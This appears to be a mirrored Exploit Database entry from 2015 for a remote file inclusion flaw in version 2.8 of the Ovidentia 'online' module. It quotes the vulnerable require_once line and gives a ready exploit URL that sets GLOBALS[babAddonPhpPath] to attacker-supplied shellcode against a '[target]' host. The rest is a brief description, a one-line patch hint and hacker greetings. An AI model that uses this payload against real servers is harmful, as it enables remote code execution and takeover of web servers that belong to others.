Ovidentia online Module 2.8 – ‘GLOBALS[babAddonPhpPath]’ Remote File Inclusion

• Exploit Database
• 14 阅读

• 作者： bd0rk
  日期： 2015-12-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39068/

• # Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
  # Author: bd0rk
  # eMail: bd0rk[at]hackermail.com
  # Twitter: twitter.com/bd0rk
  # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832
  
  PoC:
  /online-2-8/programs/admin.php line 2
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  require_once( $GLOBALS['babAddonPhpPath']."functions.php");
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  [+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?
  
  Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
   So it's possible to compromise the web-server about it.
   An attacker can inject s0me php-shellcode.
   I think, it's a big problem in this web-software!
  
  Patch: You can declare the vulnerable parameter or use an alert.
  
  
  ~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~